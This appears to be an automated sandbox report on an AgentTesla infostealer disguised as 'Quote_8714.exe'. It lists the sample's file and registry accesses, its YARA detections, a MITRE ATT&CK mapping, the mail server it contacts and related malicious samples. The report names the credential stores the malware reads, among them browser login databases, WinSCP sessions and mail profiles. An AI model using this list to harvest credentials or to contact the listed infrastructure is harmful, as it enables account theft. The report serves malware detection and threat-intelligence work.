Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Users\user\Desktop\Quote_8714.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.Quote_8714.exe.3a82990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quote_8714.exe.3a59970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Quote_8714.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quote_8714.exe.3a82990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quote_8714.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quote_8714.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quote_8714.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quote_8714.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.Quote_8714.exe.3a82990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quote_8714.exe.3a59970.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Quote_8714.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quote_8714.exe.3a82990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quote_8714.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quote_8714.exe	37%	ReversingLabs	ByteCode-MSIL.Infostealer.Pony
Quote_8714.exe	48%	Virustotal		Browse
Quote_8714.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.mbarieservicesltd.com	199.79.62.115	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.carterandcone.coml	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://mail.mbarieservicesltd.com	Quote_8714.exe, 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.79.62.115	mail.mbarieservicesltd.com	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571202
Start date and time:	2024-12-09 06:51:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quote_8714.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 136 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:52:05	API Interceptor	66x Sleep call for process: Quote_8714.exe modified
00:52:07	API Interceptor	17x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
199.79.62.115	PO82200487.exe	Get hash	malicious	AgentTesla	Browse
	ORDER#023_2024.exe	Get hash	malicious	AgentTesla	Browse
	QFEWElNtpn.exe	Get hash	malicious	AgentTesla	Browse
	SoA_14000048_002.exe	Get hash	malicious	AgentTesla	Browse
	Quote 000002320.exe	Get hash	malicious	AgentTesla	Browse
	LPO-2024-357.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Quote5000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	Quote1000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	Quote 40240333-REV2.exe	Get hash	malicious	AgentTesla	Browse
	PO ALJAT-5804-2024.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.mbarieservicesltd.com	PO82200487.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	ORDER#023_2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	QFEWElNtpn.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	SoA_14000048_002.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Quote 000002320.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	LPO-2024-357.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	Quote5000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	Quote1000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	Quote 40240333-REV2.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	S1a5ZF3ytp.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	List of required items pdf.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	h0UP1BcPk5.lnk	Get hash	malicious	Unknown	Browse	216.10.240.70
	Ti5nuRV7y4.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	PO82200487.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	ORDER#023_2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	QFEWElNtpn.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	SoA_14000048_002.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115

Process:	C:\Users\user\Desktop\Quote_8714.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:lGLHxvCsIfA2KRHmOugo1s
MD5:	5F0D346111304642BD6E3112D4031BA6
SHA1:	0141E3AAE28617B7F350C1FAA1DDA3F030724A95
SHA-256:	B8FC7BFEDD729A8BF385F9BF90A47B5F60C03CDA9FD02DE219362EB373292EBD
SHA-512:	8041A71256BCFA84E950D5E1C36419A75939AE350997712DB037F880411EB0763C49FD72A78A74759AFE4A310BB0F2B2E030D84391F3134C4029D435161A3E5F
Malicious:	false
Reputation:	low
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mpx2ckq.g3y.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
